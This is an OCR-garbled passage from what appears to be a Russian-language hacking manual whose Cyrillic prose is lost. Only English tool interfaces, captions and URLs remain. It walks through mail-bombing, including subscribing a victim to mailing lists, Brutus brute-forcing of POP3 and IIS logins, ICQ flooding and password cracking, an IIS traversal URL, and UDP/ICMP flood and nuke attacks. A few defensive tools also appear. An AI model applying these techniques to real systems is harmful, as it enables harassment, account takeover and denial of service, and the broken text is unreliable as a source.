Message Body: | SMTP Spy
jendjombjl | Edil Headers | | Abort | | Clear | | Clone | fy
i-Size of BombI B Randomly Change [ ,Usages to send: -m I Edit Server list JI 1 I O Never ending bomb
20.01.2003.
use the Edit He
Puc. 6.1. DnD DnD, , 1-1. , ( ). . .84
DnD Settings (), DnD (. . 6.1). DnD Settings () : > SMTP Host ( SMTP) , SMTP-, . SMTP Sword-2000.sword.net. > Spoof Host ( ) , . , . Randomly Change ( ) , SMTP-. > SMTP-, Edit Server List ( ). Random Server List ( ), . 6.2. Random Servei List ^orca.esdIH.w | |mw.highway1.c| |intetconnect.ne| lhorizQns.net stjohns.edu ] Imalasada.lava. | lpressentef.com | |cyberhighway.n| |widQwmaker.co| Iclubmet.mettob | j jcabletegina.co | J |maple.nis.net |
mail.sisna.com| | why.net
wwa.com J |nyx1G.cs.du.ed| | clinet.fi soi.hypeichalcl rdagobert.rz.uni-jl lspace.net tka.com ihZOOO.nel | Iplix.conr
Idubmet.metrob | ltMvl.net | vitro, com
Puc. 6.2. SMTP-
SMTP- Random Server List ( ) . Submit (). Size of Bomb ( ) (. 6.1) : # of messages to send ( ) . 10. Never ending bomb ( ) .
85
Check the box and then fill in the information that will appear in the headers under that category; or uncheck the box to remove it from the headers. X-Mailer: X-URL: X-Sender: X-Date: | | | |
Q Return Path: [ Q References: | Priority: I
Q X-Authenlication Warning | Generate IP | |124.49.153.SO | [TedGilsdorf Clear Cancel
Ok
Puc. 6.5. MIME
13 , DnD , . , , . , Clone () E-Mail bomb ( ) Bomber Spawn 1 ( ), . 6.6.-a Bomber Spawn 1 Sendbombto: Say bomb is from: Message Subject:
-1
l|
1
Randomly Change | | Random
Message Body:
1SMTP Server: gl Randomly Change
ya
l l l I Edit Headers | | Abort | Clear l nl m| |[Status {Messages Sent! |0
j?I |
Puc. 6.6. 88
, Bomber Spawn 1 ( ) E-Mail bomb ( ) - SMTP-. , SMTP-. - - , ! - . , , ( - ). > , DnD Clones Load Multi Clones ( * ). Number of clones ( ), . 6.7Number of clones How many clones do you want to load?
L
J
Puc. 6.7. - ! > Number of clones ( ) ( 5-6) . Bomber Spawn ( ), 1 - . Send Bomb ( ) . - !
&& ! , - , 89
! DnD , , Mailing lists ( ). Subscribe joe lamer to mailing list ( ), . 6.8, , Euro Queer ( ), Mormons (), Family Medicine ( ) - !*i Subscribe joe lamei to a mailing list!
1=1
Subscribe your enemy to a mailing list even worse then a mailbomb! More lists coming next version..sorry lor the small quantity (his lime. My apologies for the bad usability but I will use checkboxes instead of option boxes next version.. Jewish List CMd Parenting Targets email address: Targets fits! name: Targets last name: Lesbians over 40 Family Medecine [ |j0hn |
Digital Queers Gay Quakers Mormons Gay/Lesbian Euro Queer Christianity womanism people
Bi Australians Allergies
Puc. 6.8. DnD DnD . Target Email Address ( ), Subscribe em () - . , .
, , DnD , , , . , Extras Pword generator ( * ). Randomic Password Generator ( ), . 6.9. , How many characters? ( ?) ( - 8 ) : Use Both ( ) - , Use numbers ( ) - 90
Use letters ( ) - . - , , .* Randomic Passwoid Geneialor
Jusl click to generate a random password. Choose how long you want it to be by the number ol characters. How many characters? [12 | Use Both 6i2i9e1m5p8i Use numbers Use letters
Extras () - . 6.9. SMTP- ( SMTP Remote ( SMTP)), ( Raw Port ( )). , ( , SMTP). Other Tools ( ) . - , , . , - ; . , , . , ( ). , .
Close
Clear box
. , , - ( IMAP) , . - . Brutus Authentication Engine Test 2 ( Brutas , 2), Brutus AET2 (http://www.hobie.net/brutus). . 6.10 Brutus, , FTP, HTTP, Telnet NetBus.91
1
I Biulus AET2 - www.hoobie.net/biutu: - (January 2000)lie Tools Help | Ti"pe|POP3 | | | Start ~
(SisJE I| Stop [Clear
1
Target
|127.0.0.1
Port (110 | Connections 10 Timeout ^} 10 Use Proxy | Drf |
| ' S. ^P9?l D Try to stay connected for [Unlimite || attempts B? .? . . . . .| ^
.
.
. Single Usef | | Browse | Pass Mode [Word List " | p pass pje jwords.txt | | Browse |
0 Use Username User File | users.txt
Positive Authentication Results Target I Type I Username I Password I
5J II II
|
)
R*cl
AuthSeq
Throttle Quick Ki
ll>dle
Puc. 6.10. Brutus
*
, Brutus ( 8 Brutus IIS). , alex-1 .sword.net, kolia. , , - , . . > Brutus - 2 (. 6.10) Target () , alex-1.sword.net. > () , . > Connection Options ( ) Use Proxy ( ), - . > Authentication Options ( ) Single User ( ) - .
92
User file ( ) , .. - kolia. > Pass Mode ( ) Brute Force ( ). Brutus , . 6.11.X Biutus - 2 - www.hoobie.net/biuluit - (January 2000J File Tool. Help Type|POP3 [ | | Start | Slop | Clear | T
Target
|alex-1.sword.net
P
nnection Optioru >orl [110 | Connections I 10 Timeout I 10 Use Proxy I Define!
IPS Options Try to slay connected for |Untmil8 |-r | attempts
| Modify sequence | -Authentication Options 0 UseUsemame UserlD | kolia
0 Single User
Pass Mode [Brute Force|--1 |[Kange|| | Dfellfcuted |
Positive Authentication Results Target I Type I Username | Password |
Rtet
AuthStq
Throttle Quick Kil
Puc. 6.11. Brutus POPS Range (). Range () Brutus - Brute Force Generation (Brutus - ), . 6.12.Biutus - Biule Foice Generation Digits only Lowercase Alpha Uppercase Alpha Mixed Alpha Alphanumeric Full Keyspace Custom Range |etaoinsrhldcumfpgwybvkxjqzl 234567890! | Min Length [ Max Length [4 [T Cancel
Puc. 6.12.
93
Brutus - Brute Force Generation (Brutus - ) - , , . , - , Min Length ( ) 3, Max Length ( ) - 4. , Digits only ( ). . > Start () Brutus - 2 Brutus - 2. . 6.13.X Uiutus - 2 - www.hoobie.net/biutus - [Januaiy 2000J File Took Help Type|POP3 EJ | Start | Stop | Clear |
1=1
Target | alex-1.sword.net i-Connection Option*I
Port [110
|
Connections
10 Timeout
10
rPOlP3 Options-
I?
| Modify sequence |
D Try to stay connected for |Unlimite | > | attempts
-Authentication Options El Use Username UserlD [kolia 0 Single User Pass Mode [Brute Force [ I Range DisllbAed
Positive Authentication Results Target alex-1.sword.net I Type POP3 | Username kolia I Password 0007 I
Positive authentication at alex-1 .sword.net with User : kolia Password : 0007 (1 0997 attempts
Timeout10997 Uikolia P:0000 ~]|37 Attempts per second
Reject|Idle
Throttle
Quick
Puc. 6.13. 1. Positive Authentication Results ( ) , kolia - 0007. , Brutus 10997 alex-1.sword.net ( 11000). 5 Pentium 3 1000 , Ethernet 10 /. , , Brutus (
94
). -, , , ( 8 !), , (, &$ ..). ! Brutus - Brute Force Generation (Brutus - ) 8 , Full Keyspace ( ). Start () Brutus - 2 - 6 095 689 385 410 816 - , ! 12 ? , , , (., , [10]). Brutus, Pass Mode ( ). ( 100 000), , . , password, parol, MyPassword - Web- - . -, , , Ethernet, 30-50 / ( ). - . - , - , , , . . , , , , , . . - , .
95
IIS Brutus 8 , - . , , . , , , - , - ! : !. .
, , , . 1, , , , . - , , , , . , - ( - ), . , - , . . , TFTP 1-1 , 1-1 . , TFTP , . TFTP , , , . , , , , , . . , ,96
( ) . , , , Web- - .. ( , ). . - , , , -. . - , .. , - , , . , .. , - - . , 2002 ., , , . Web-. . . ... ( ). Web-, , ?, . , , ?, ?, ? . - , , , , . , , , , , . , , - , , repa_parenaia, - !
- . , , , , . 974 - 5830
- , , , - , . . , - . , . , ( ) , - ! . , 8 ( 12) , , . , DnD . . , - , Norton Antivirus MacAfee VirusScan. , - PGP Desktop Security. , . , - , , , . - - , .
98
7.
ICQ ICQ Intelligent Call Query, . ICQ [--] : I Seek You - ; , ICQ . ICQ , 1998 Mirabilis, ( 40 ) AOL. ICQ , ICQ , , . , , ICQ, , . , , - . ICQ , ICQ. ICQ , ICQ, , http://www.ICQ.com, http://mira-bilis.com. ICQ - ICQ , , 1998,1999, 2000, 2002, ICQ 2003. ICQ UDP, 4000, - TCP, . , ICQ, UIN (Unique Identification Number - ). UTN - ICQ , . , ICQ? ICQ , . , ? .
-, ICQ, . -, ICQ ICQ . , ICQ, : , UIN , , . , ICQ , - ICQ . , , - . ICQ-, , IP- ICQ-, , . , , DoS, 9 . , IP- ICQ, - , ICQ- . ! , ICQ-, . , , , - , . ICQ, Mirabilis . ICQ, ICQ , . , .
100
ICQ
ICQ . - , ICQ ICQ ICQ. , ICQ ; , ICQ- (, LameToy www.mirabilis.com). , ( ) , . , , , , , . , ICQ. . . Sword-2000 ICQ Groupware Server, Alex- ICQ Groupware Client, UESf, 1001, 1-1 , UIN, 1003. ICQ Groupware http://www.icq.com. ICQ, ICQ Groupware, , , 1. - , ICQ - , ICQ . ICQ ICQ-, ICQ-, ICQ- .
101
UIN ICQ- UIN ICQ, , UIN . UIN . , , - . - - , . , , . ( ) LameToy for ICQ (DBKILLER), , , ( http://icq.cracks.ru/attack.shtml). LameToy for ICQ , , . LameToy for ICQ. . 7.1 , LameToy for ICQ.LameToy For Icq [DBKILLER] | Send [ Losei-
1[Normal Message M
Slop | | Update; | Menu | | Hide [f Exit Selling-
LLMZ.
JQ044J-UlNSniffer-
I
Pott Scarmei- |Sendei miNBIiOOl
1.
I Get Local IP 11501
[
IPasswdL Messsage
l|URL|hHp:/V
Puc. 7.1. LameToy for ICQ (DBKILLER) ICQ LameToy for ICQ (DBKILLER) - Send (). , Setting () Loop () , . UIN, UIN# - Ran (Random - 102
ICQ ). , , , , . , ICQ-, - , UIN UIN . , ICQ (ICQ99a ICQ99b) . DB- ( - ), DB Data Base - , , DB NewDB. LameToy , DB killer ( DB) Setting (). ICQ, . , , LameToy, UIN , , , System Messenger - ICQ Team (http://www.icqinfo.ru/softjcqteam.shtml), ICQ Sucker .
lf~ac)peca ICQ- DoS ( ) , - . , , , Advanced ICQ IP Sniffer - ICQ Team ( Web, , http://www.icqinfo.ru/sofl_icqteam.shtml). . 7.2 Advanced ICQ IP Sniffer.Advanced ICQ IP SnifferYour UIN: [207685174 | Password: IJ Clear list Timeout. Tiy again. Saver
a a a'
UIN to check: |123456783 Cheek
Ext IP: |Status: |
|
IntIP: |
|
TCP Pott: | 0
|TCPFIa9: |
| TCP Version: |0
Puc. 7.2. - IP- ICQ
103
IP- ICQ UIN, Advanced ICQ IP Sniffer ICQ, UIN . , , Your UIN ( UIN) Password () Advanced ICQ IP Sniffer ( ICQ). Check () , ICQ UTN , Info () . , Info () . 7.2 , ( ) IP- ICQ, TCP-, ICQ . , , Ext IP ( ), Int IP ( IP) TCP Port ( TCP). , ICQ- ( ). ICQ, Advanced IP ICQ Sniffer, ICQ server's address and port ( ICQ), Server () . 7.3.ICQ server's address and portAddress: licq.rnirdbilis.com Port: [4000 |
3||
| ||
OKCancel
ICQ server's address and port ( ICQ) Mirabilis ICQ 4000. , / IP- / .
. 7.. ICQ server's address and port ( ICQ)
ICQ, , , ICQ-, ICQ- ICQ. , , . , ICQ, ICQ-MultiWar (http://www.paybackproductions.com/), - ICQ Flooder (. 7.4).
104
ICQICQ Flooder FileVictim's address: 127.0.0.1 El Randomly generated UIN Appatenl source UIN: Q No. ol Messages: |1 Message: Eat this! [ | ICQ Port [1027
ICO Flooder 1.2 Copyright (C) 1998 dph-man and Implant Man
Puc. 7.4. ICQ ICQ Flooder, . > Victim's address ( ) IP- ICQ. > ICQ-port ( ICQ) TCP. > , UIN . : UTN - Randomly generated UIN ( UIN), UIN UIN. UIN - Apparent source UIN ( UIN ) UIN, ICQ . > No. of Messages ( ) ICQ-. > Message () (- , ). > Send! () . - , ICQ, , - , , 105
http://mht.hut.ru/icq/icq.html, ( , , ICQ , ). ICQ - , , , - !
ICQ ICQ, ICQ, , . , , . , , ICQ subMachineGun v1.4 (http://icq.cracks.ru/best.shtml), . 7.5.OICO SubMachineGun vl.4 by uD File Settings About [ Bruteforce ] [... [ 13 Single [~~] Single About Agent Force!
| ( ) uD . Moscow 2QO1 |c
Puc. 7.5. ICQ subMachineGun U1N ICQ
106
ICQ brute force - , , . . ICQ ICQ subMachineGun . > ICQ subMachineGun. > Settings * Connections&Cracking (&). , . 7.6.icq server [ Cracking ] 13 Stop if successful... Make log of cracked uins 0 Reconnect if timeout 0 Cut passwds length to 8 digits set timeout: relogln ; times port
Cancel
OK
Puc. 7.6. U1N icq server ( ICQ) ICQ, , ICQLmirabilis.server. port () 4000. Cracking () : Stop if successful ( ) ICQ. Make log if cracked uins ( UIN) ICQ.107
Reconnect if timeout ( ) ICQ . Cut password length to 8 digits ( 8- ) 8- . > set timeout ( ) 15 . > relogin ( ) ICQ 3. ICQ subMachineGun UIN . . > ICQ subMachineGun Bruteforce ( ) UIN. . Single () UIN, . Single () UIN. UIN, (...) Making victims list ( ), . 7.7. Making victims list ( ) Range () , , UIN ( - 100000) ( 900900).
I Hint: use Del to remove uins from list
Puc. 7.7. UIN
step () UIN ( - 100). Generate () UIN; .
108
ICQ , Generate () - UIN, , , .. Add () UIN . > UIN, Open () UIN ( UIN ). > - UIN , t0*"!. Clear () UIN ( ). UIN, . . > ICQ subMachineGun Bruteforce ( ) . . Single () , . Single () . > , (...) Make passlist ( ), . 7.8. Make passlist ( ) . > Open () ( ). - , ICQ.
Use Del to remove passwords from list
Puc. 7.8.
v Generator () Add (). , .109
> , 0 *"**]. Clear () ( ). > , . . Force (). , ICQ subMachineGun v1.4 (. 7.9).OICQ SubMachineGun vl 4 by uD File Settings About
[ Bruteforce ] [] 0 Single [~~] D Single
About Agent
Puc. 7.9. - ICQ subMachineGun v1.4, UIN, ( , . 7.9 ). , , 15 , ICQ. - 45 , ( ). , , , , , .. - . ...110
ICQ
( -, , ICQ - . ICQ , ICQ . , ? - ! , ? , ICQ- , . , . ? , Windows. , . , ICQ , ICQ. ICQ-, , ElcomSoft Advanced ICQ Password Recovery (http://www.elcomsoft.com). , . . 7.10 Advanced ICQ Password Recovery.
31.01.2003 2:05 - ACQPR1.0 launched, registered version
6.COPR 1.0 (cl 2000 Plea Goriunov and Andy Malvshev. ElcomSofl Co. L
Puc. 7.10. ICQ .dat ICQ, Advanced ICQ Password Recovery ( ICQ) .dat, ICQ.111
, , ICQ 2002 2002. 2002 , UIN .dat, .., , 207685174.dat (207685174 - UIN ). ICQ Password successfully found! ( ICQ ), (. 7.11).ICQ Password successfully found ! ICQ version: 99b-2000b UIN password:
% Copy to Clipboard
fij Close
Puc. 7.11. !
. 7.11, ICQ 99b - 2000b, ICQ 2002 ( ). , ICQ , - , - ICQ-. - , , (. [11]), Web- (. 8). , , , .
, ICQ ( ) , . , , , ICQ. , , ICQ - , - . , . ICQ, . . , , ICQ- - ICQ . , ICQ , UIN . - 112
ICQ ? , , , - , . , , - , , , , , , - . ICQ - , , , , , , , , . - , .. ICQ, , , . , ICQ ICQ, ICQ ( , ICQ Team (http://www.lcqteam.com)). ICQ- ICQ, ICQ- - ICQ. - , . , ? , , . , - , ? , ... , , , . ICQ-, - , .
ICQ , . ICQ - ,
113
ICQ-. ICQ DoS ... . ICQ . -, , ICQ-, ICQ-, ICQ- . ICQ, ICQ. IP- , , ICQ. ICQ . , ICQ-, UTN . , ICQ-, -, , BlacklCE Defender, DoS. - , , . , . , ICQ - . -, - ICQ, ICQ. , IP- ICQ-, - . , . , . ICQ , PGP Desktop Security 2.9, ICQ- . , PGP- ( [7]).
114
8.
Web-caumoft Web? , Web , . Web- , Web- . , , , . , Web- , , , , . HTML Web- ( - ), , . HTML . ( ). , Web-, , Web-, , . HTTP, , , . Web-, , . , Web-, DoS , , Yahoo. , Web-, , ( ) Web- , . Web , .
Web~cauma Web Web , , Web, Web,
, . -
Web - Web, Web . Web - , Web, Web . Web , . Web - Web, , Internet Explorer (ffi), - HTML Web-, HTTP, Web. Web , IIS Microsoft, Apache HTTP Server Apache Software Foundation . Web, ASP (Active Server Page - ) CGI, , Java SUN, Apache Software Foundation . Web, Web, , . SQL Microsoft, Oracle Oracle . , , , - ODBC (Open Data Base Connectivity - ). - , , , , , ... ?
1 Web~cauma , Web-, . , .
116
Web- Web- - , , , , , Web . Web- - Web- , , TCP- 80, , Web-, ( CVE, Web-), Web- - . Web - - ASP, Java, CGI - , . Web - , -, , -, ( !). , , - . , , (cookie), , . - Web- , , . , , CGI- , - CGI- , , , . - , Web- , . - , Web- , , , - . - , , , Web-, Web-, . , (, . []). , , , , IIS 5. , 117
( HTTP), CGI- ( ) Web ( Web). Web- , . IIS , Web-, . , Web- , - , . - , Web-. - . , FTP- , , . , . Web- .
Web~cauma , Web-, . , , , , . , , . , Web- , - , , DNS-, . Web. , .
118
Web-
cbp Web- . . -, , - , . IP-, , , . Whols . -, HTML- Web- . HTML , Web, , . , , , , JavaScript . , HTML- Web Web- Teleport Pro. , , Whols - , , Web. whois ( Unix), Web- , whois Web-.
Whols . , , . 1999 - Network Solution (http://www.networksolution.com), , , InterNic (http://www.internic.net). / . Web-, Whois ( ), . Whois , ,
119
, DNS . , RIPE NCC (Network Coordinate Center - ), IP- . Web- RIPE NCC (http://www.ripe.net), . 8.1.t @ T 1 Aqp9c|fehltp://www.ripB.net/npen^^ub^^c^^ El ^ |
. 8.1. Web- RIPE NCC IP- Web- ? - - DNS - .
, SuperScan (http://www.foundstone.com), . 8.2. SuperScan, . > Start () - . > Stop () . > Scan type ( ) All list ports from ( ). > Start ().
120
Web-
Timeout StarlfTMT Stop|l.0.0.5P'ng |400
|
Resolve hoslnames 121 Only scan responsive pings [3 Show host responses Ping only Every port in lisl All selected ports in list (5 All list poets from All ports from
5 EZB
Conned |2000 | 0 Ignore IP zero 0 Ignore IP 255 Extract from He Read 14000 I
. 8.2. SuperScan . , IP- 1.0.0.1 HTTP IIS 5.0, - Web. ( ), .
6 shares found on 1 remote hosts.
w a-
1.0.0,1My Documents NETLOGON D Tesl My Downloads SYSVOL
M.0.0.1SMy Documents M.O.(mNETLOGON M.0.0.1\D M.0.0.1\Tesl . Downloads M.0.0.1\SYSVOL
Map Drive
. 8.. IIS 5121
Legion (http://packetstormsecurity.org/ groups/rhinoS), - 1.0.0.1 . 8.3. , - IIS 5, - , ? .
II5 | IIS , HTTP (Hypertext Transfer Protocol - ) CGI (Common Gateway Interface - ), IIS, . HTTP , , [12], - Web . HTTP , GET. Web- (, ), GET, , , http://www.anyserver.com/documents/order.html. order.html /documents IIS, c:\inetpub\wwwroot\documents. CGI , , [12], . HTTP, : http://www.anysite.com/scripts/MyScript?napaMeTp1+napaMeTp2 MyScript - , /scripts IIS, a ?1+2 , MyScript. IIS , , , . CGI, ASP (Active Server Pages - ) ISAPI (Internet Server Programming Interface - ). ASP : http://www.anysite.com/scripts/MyScripts7napaMeTp1 =1&2= 2
122
Web- MyScript.asp, , , HTML. ISAPI , ISAPI. HTTP: http://www.anysite.com/isapi.111?1&2 , IIS, , .
HTTP , IIS . IIS 2.0 :
http://www.anysite.eom/.7.7.7.7.7winnt/secret.file Web- , secret.txt. - Windows, ACL. IIS , Web- [3]. IIS , , , , , SecurityLab.ru (http://www.securitylab.ru). IIS, netcat (http://www.atstake.com), (netcat - - [3] netcat IIS). netcat Sword-2000 , . netcat . > Alex- netcat, nc -vv 1.0.0.1 80. v GET / HTTP/ 1.0 111. . 8.4. GET / HTTP/1.0 IIS. . 8.4, HTML, .
123
ic-MCommand Piompl c:\test\netcat>nc -vv 1.0.0.1 80 GET / HTTP /1.0
nisnatch: SUORD-20UO != | DNS fud/reutl.0.0.1] 80 open SUORD-2000
suord-2000.suoi-d.net
HTTP/1.1 400 Bad Request
Seruer: M i c r o s o f t - I I S / S . 0 Date: Fri, 28 Feb 2003 12:55:40 GHI Content-Type: t e x t / h t n l Content-Length: 87 itml>ErrorThe parameter sent 17, rcud 224: NOISOCK C:\test4netcat>
Puc. 8.4. GET IIS netcat , GET Start () Brutus - 2 (. 8.20) . Brutus - 2 . 8.22.
140
Web-^ ^ 1 X Brutus - AET2 - www.hoobie.net/brulu: - (January 2000) ^^ 1File Tool Help I Type I HTTP (Basic Auth] | | | Start Stop | Clear
Target | . 0.0.1 1 . I 1 Port 1 30 Connections ^ '
10 Timeout
10
Use Proxy [ Define |
Method
(HEAD
P I
0 KeepAlive
0 Use Username U sell D [Administrator
0 Single Usei |Biw*|
Pass Mode [Brute Force pj | Range 1 1 OfeWbutw) |
Fife
lwrdi.txt
|||
Positive Authentication Results Target 1.0.0.1/ 1 Type 1 Username HTTP (Basic Auth) Administrator 1 Password 007 1
992
^* ** ** ^ ^.||U:Adrniriistrator P:000 | 5 Attempts per second |8 |l l |de
Positive authentication at 1 .0.0.1/ with User : Administrator Password : 007 (992 attempts) Disengaged target 1.0.0.1 elapsed time : 0:00:17 attempts : 992
/f
Puc. 8.22. IIS ! , IIS , . 8.23, , .
Puc. 8.23. Web , Brutus , Web. CGI- Web-. () HTTP (Form) (HTTP ()) GET ,
141
, , , .
Web, , - . Web , . , , . , Windows NT/95/98, Web- CGI Vulnerability Scan D@MNED CGI Scanner 2.1, , , Web, , . , Web-, , , . Web - , Web- . , Web- - , Retina, , , [7]. Web- - , .
142
9.
UoS , TCP/IP, TCP/IP , . , , - , DoS (Denial of Service ). DoS -, TCP/IP . DoS , . DoS , , Yahoo, eBay, CNN.com, www.Microsoft.com, , [3]. , - , , , . DoS , , , , . , [3], DoS , . , , , , DoS Web-; , DoS . , , - , DoS. , DoS , . DoS , , , , - - IDS (, BlacklCE Defender (http://blackice.iss.net/)), .
DoS, , .
' DoS , . , , DoS . - , , , ( Web- Yahoo). . , , 1 ( 1544 /), , , 56 / ( ). - , , , . . - , . - , , . - , . , . - , , . . DoS , , .
144
DoS
, . 1, Web- [3], , . , , . , . , - UDP ICMP. DoS, , , /. .
, UDP UDP, . , DoS, UDP Flooder 2.0 Foundstone (http://www.foundstone.com), , - , . . 9.1 UDP Flooder 2.O. UDP Flooder 2.0, DoS 1-3 IP- 1.0.0.5 . > UDP Flooder 2.O. IP/hostname (IP/ ) IP- NetBIOS - IP- 1.0.0.5. > Port () , 80, HTTP-.
145
UDP Flondfir 2 IP: 1.0.0.1
^ __. 11011 .|II
1Port [30 |
IP/hostname |1. 0.0.5
Max duration (sees) Speed (pkts/sec)
^Infinite] |
Max packets [[Infinite]
|
min
max[[ -
| 250 |
.
~"V
Modem > Cable > Tl > LAN
Random Text
[20000 | to [30000 | bytes |"' UDFFlocH! Server eH'iste
||| Go
From file | Brows 1 1
Packets sent Seconds elapsed
903 20.299
|
Stop
Puc. 9.1. UDP Speed () LAN, . Data () Random ( ), - FileWindows Task Manager Opliont View Help Applications | Processes J Performance | Nettvi^ing [ . Sword > , , 20 000 30 000, . > Go (). > , , Stop (). . 9.2 Alex- , Networking ().146Adapter Name I Network Utilization I Link Speed I 10 Mbps
Operatic
[[Processes: 39
||CPU Usage: 22%
[[Commit Charge: 150620K / 47864 J
Puc. 9.2. 80%
DoS , - UDP, 50% . - , LAN Ethernet I DBase.
4>) ICMP ( ) ICMP (Internet Control Message Protocol - ) UDP. . 9.3 X-Script ICMP Bomber.pt ICMP Bomber vO 3 By Code Host |1.0.0.5 Packet Size: h ooOOO \ NumberToSenchhooo
Received 34464 bytes from 1.0.0.5 in 60 msecs Received 34464 bytes from 1.0.0.5 in 60 msecs Received 34464 bytes from 1.0.0.5 in 60 msecs Received 34464 bytes from 1.0.0.5 in 60 msecs Received 34464 bytes from 1.0.0.5 in 60 msecs
. 9.. X-Script ICMP Bomber , , Host () IP- , Ping (). , Packet Size ( ) , Number to Send ( ) . - . . 9.4 , Alex- ( IP- , , 1.0.0.5). ICMP , ICMP (Internet Control Message Protocol - ) TCP/IP, ICMP . ICMP , Web-; ICMP .
147
" Windows Task Managei File Options View Help
Applications I Processes I Performance I Networking
Processes: 38
||CPU Usage: 5%
\\Commb Charge: 1417 / 47864 ^
Puc. 9.4. DoS !
Aht3K3 Smurf , , , DoS ? Smurf, . , , Smurf . ECHO () ICMP, . IP- , . , , - 10 , . , DoS, DDoS (Distributed DoS). DDoS -, . , ,
148
DoS DoS . DDoS WinTrinoo ( http://www.bindview.com), , , DDoS Win32. 2000 DDoS , Web- (, , , WinTrinoo). - Foundstone , , DoS.
DoS, , , , , . , , DoS, , . , . DoS PortFuck, ( TCP- , ). PortFuck - TCP- , . , , , TCP- , , , . . 9.5 PortFuck.! f PortFuck 1.02 PRIVATE BUILD .: Host: localhost Port: ] | START
Reconnect on Disconnect Delay (MS): | 000 1 [Ready. |
|
Help?P A
NICI |
Socks: [5
Puc. 9.5. PortFuck 149
Nuke Nuke , DoS, , , -, . - , . TCP/IP ICMP, ICMP . - - , .. - ICMP, , , . , . - - , , , , . Web-, , . Nuke - . DoS Nuke , , Windows 2000/XP , Windows 9x. Windows 2000/XP, (, [4]). , Windows 9x, , . , . Nuke - , . , Windows Nuke'eM version 1.1, . 9.8. Nuke , - Alex-2, IP- 1.0.0.4 Windows 95. . > Address () Windows Nuke'eM version 1.1, . 9.8, IP- Alex-2 (Windows 95), Alex-3 (Windows XP) Alex-1 (Windows 2000). - Add () .152
DoS
Address [1.0,0,7 1.0.0.4 1.0.0.5 1.0.0.7 lext [Testing 1 2 3 JDelay ft
\"\ Eort [
[ ^ dose after execulio -
This program is created by Sadikuz (c) for test-purposes only. The author of this program is not responsible for any misbehaviour by | Add | |Remove! | HelpI
Execute Dong
Puc. 9.8. > Execute (). Windows Nuke'eM version 1.1 (. 9.9).Windows Nuke'eM - Version 1 . 1Rle
Help
MEot|l39 ]I
Address |1. 0.0.7 1.0.0.4 {Nuked} 1.0.0.5 {Connect error} 1.0.0.7 {Connect error} lexl |Testing 1 2 3 Delay |o
| Q Close after execution ^
This program is created by Sadikuz (c) for test-purposes only. The author of this program is not responsible for any misbehaviour by ||
Add
| | Remove | |
Help
| 1 Execute
I
I
Unable to connect to: 1 .0.0.7
Puc. 9.9. Alex-2 ! > Alex-2, 1-2 Windows. Windows , . 9.10. , 1-2 - Nuke. , IRC- IP-. Windows , , , IDS ( BlacklCE Defender).
153
- ICMP- Source Quench ( ), . , ICMP- Destination Unreachable: Datagram Too Big ( : ). , ICMP DoS , , , , , , . , , DoS, TCP/IP - NetBIOS Sir Dystic, nbname, NBNS IP- NetBIOS Windows 2000 [4]. nbname, , NetBIOS NetBIOS. TCP/IP - , , , , net send. , nbname - , nbname, , nbname.
DoS - , . , , , . , [11] , , DoS, , , Web- . , Web-. - , DoS. DDoS - , , , , ,
156
DoS -. , Foundstone. , , .. , 1 , Foundstone . DDoS, , Foundstone . Foundstone, (Robin Keir), http://www.foundstone.com DDoSPing 2.0, -. , UDP, UDP . . 9.11 DDosPing 2.0, .-Target IP address range Start IP address End IP address |1.Q.Q.5| h.OO 5 -Transmission speed controlSpeed (pkts/sec)I 181 I
Slop
Modem>-Cable>T1 >LAN -Infected Hosts-
-o-
Program started: Sun Febl613:50:48 2003 Waiting 6 seconds for final results... Program stopped: Sun Feb1613:50:54 2003
- Status Current IP Packets sent Time elapsed Zombies detected ne /,
1.0.0.5
3 00:00:00 0Affp://i
Save List Configuration
. 9.11. DDoS DDoSPing 2.0 . > Start IP address ( IP-) End IP-address ( -) IP- .157
> Speed () , , LAN. > , Configuration () . 9.12).
Enable Send to UDP port "Ping" command Expected reply
|
Windows defaults |
UNIX defaults |
[34555
Listen on UDP port |3555
|pngQ..KsH4 (PONG
I iP^ceivelCMPID [69 |
0 Enable SendlCMPID "Ping" commend Expected reply [668 Jgesundheit! |sicken\n |
I IReceive ICMP ID [ |
0 Enable SendlCMPID "Ping" command [?89 |
~ """" Show UDP transmit errors Max run duration (sees) Transmit each packet After scon ends, wait [O 1 I (Qforev@r) times sees for final rep lies Cancel
i
I
| OK'
. 9.12. > , Windows defaults (Windows ) Unix defaults (Unix ), Windows Unix, . > , DDoSPing 2.0 , WinTrinoo, , - StachelDraht Tribe Flood Network. , (. 9.12). > DDoSPing 2.0 . 9.11 Start () . Infected Hosts ( ). , - Zombie Zapper (http://razor.bindview.com/tools/ ZombieZapper__form.shtml), WinTrinoo. . 9.13 , , , DDoSPing 2.O.158
DoS
Target(s) Target IP: | input IMs...
0 Specify single IP or class subnet
|
0 Trinoo 0TFN 0 Sta.chelDroht
UDP source
|53
0 Trinoo for Windows
QShatt-myfloodedhost: [ T o I Repeats (1-300)
|
Zap
Exit
Puc. 9.13. Zombie Zapper DDoSPing 2.0, Zombie Zapper , DDoSPing 2.O.
, , , DoS - , , 1 . , , - , , - Web- - . - , , , , , . DoS , - (-, , ) Web-. IP- ICMP-! EDS DP-, , , , Web. , - , . DoS , - - !159
10.
Windows ZOOO/Xf, , - () , , - , ( , , [1]). , , , - - . , . ? TCP/IP, . TCP/IP . . 1 , . - , , [11]. , , , . 1, , - .
cemu*TCf/lf IP- , ping , W2RK (Windows 2000 Resource Pack). - ICMP (Internet Control Message Protocol - ). . . 10.1 ping Sword-2000.
Windows 2000/XP \ Command Prompt
Pinging 1.Q.O.I with 32 bytes of data: Reply Reply Reply Reply fron fron fron fron 1.0.0.1: 1.0.0.1: 1.0.0.1: 1.0.0.1: bytes=32 bytes=32 bytes=32 bytes=32 tinenbtst
Sviord: Node Ipflddress: 11..0.5] Scope Id: I I NetBIOS Remote Machine Nane Table
SUORD-20QQ SUORD-2Q00 SUORD SUORD SUORD SUORD SWORD-20QGI SUORD MSBROUSE_ INef"Seruices IS-SUORD-2000. flDMINISlllfllOR 52-54-flB-14-S5-B4
Registered Registered Registered Registered Registered Registered Registere Registerei Registered Registered
Puc. 10.4. Sword-2000 , Administrator Sword-2000 CD-ROM. , - NetBIOS, Administrator, 7, 9, 13, 17, 139, 443, 1025, 1027 , :. Administrator - : .
164
Windows 2000/XP , pwdump3.exe Windows NT/2000/XP LC4 . , NetBIOS TCP/IP ( Windows 2000/XP )? , , SNMP (Simple Network Management Protocol - ), Windows NT/2000/XP. , SNMP, , , [11]. , , , .
Windows NT/2000/XP . , . , , , . - , ..
